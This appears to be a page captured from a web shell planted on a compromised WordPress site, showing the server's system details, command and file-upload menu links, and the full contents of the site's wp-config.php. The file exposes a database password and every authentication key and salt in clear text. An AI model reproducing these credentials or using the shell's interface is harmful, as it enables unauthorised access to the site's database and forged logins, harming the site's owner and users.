|
Server IP : 62.171.151.215 / Your IP : 216.73.217.19 Web Server : nginx/1.18.0 System : Linux vmi3128365 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : alex ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/anti-tabac.com/wp-includes/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/** Database settings */
define( 'DB_NAME', 'anti_tabac_wp' );
define( 'DB_USER', 'anti_tabac_wp' );
define( 'DB_PASSWORD', '8d7a415ea295685a9dc4e6c9' );
define( 'DB_HOST', '127.0.0.1' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );
define( 'AUTH_KEY', 'd3c4f8f57d79f4a7623c4d8af5a338c8' );
define( 'SECURE_AUTH_KEY', '157b1593c6b58b0cb54d4d0478bfabde' );
define( 'LOGGED_IN_KEY', '2d7ae0d210db67fca0fbca601d4e48db' );
define( 'NONCE_KEY', 'c5e218df79a21eef3d921fbc1d4ab4ec' );
define( 'AUTH_SALT', '0640fd7b6176d78313bca3ec9b953363' );
define( 'SECURE_AUTH_SALT', '2a4d52b1c9d1f7c7ba82f1acd67cb943' );
define( 'LOGGED_IN_SALT', 'e318b4c95b652b8b1310cb8820f6e9ea' );
define( 'NONCE_SALT', '809316780e8854c2b37a2dd6a6594426' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', false );
define( 'WP_HOME', 'https://www.anti-tabac.com' );
define( 'WP_SITEURL', 'https://www.anti-tabac.com' );
define( 'FS_METHOD', 'direct' );
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';